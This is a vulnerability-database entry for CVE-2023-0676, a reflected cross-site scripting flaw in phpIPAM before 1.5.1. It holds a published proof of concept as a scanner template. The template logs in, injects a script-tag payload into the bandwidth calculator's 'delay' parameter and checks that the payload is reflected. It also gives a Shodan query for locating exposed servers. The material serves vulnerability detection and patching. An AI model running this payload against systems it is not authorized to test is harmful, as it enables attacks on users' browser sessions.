漏洞描述
Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.
CVE-2023-0676: phpIPAM 1.5.1 - Cross-site Scripting
PoC代码[已公开]
id: CVE-2023-0676
info:
name: phpIPAM 1.5.1 - Cross-site Scripting
author: ritikchaddha
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.
impact: |
Allows attackers to execute malicious scripts in the context of a user's browser session.
remediation: |
Update phpipam/phpipam to the latest version to patch the vulnerability.
reference:
- https://huntr.dev/bounties/b72d4f0c-8a96-4b40-a031-7d469c6ab93b
- https://nvd.nist.gov/vuln/detail/CVE-2023-0676
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0676
cwe-id: CWE-79
epss-score: 0.00361
epss-percentile: 0.57602
cpe: cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*
metadata:
vendor: phpipam
product: phpipam
shodan-query: html:"phpIPAM IP address management"
tags: cve,cve2023,phpipam,xss,authenticated
http:
- raw:
- |
POST /app/login/login_check.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
ipamusername={{username}}&ipampassword={{password}}
- |
POST /app/tools/ip-calculator/bw-calculator-result.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: {{BaseURL}}/phpipam/index.php?page=tools§ion=ip-calculator&subnetId=bw-calculator
wsize=50000&delay=<script>alert(document.domain)</script>&fsize=1024
matchers:
- type: dsl
dsl:
- contains(body_1, "Login successful")
- contains(body_2, "<script>alert(document.domain)</script>")
- contains(content_type_2, "text/html")
- status_code_2 == 200
condition: and
# digest: 4a0a00473045022100e204bc47849c94a59df5df82d59bf2b7db741b10f89310bb32fa0f2fabb8b3e202203278351c127e8c21a0c374e9d9de7619c046ad7a083b41a8c05d82a4a4f15825:922c64590222798bb761d5b6d8e72950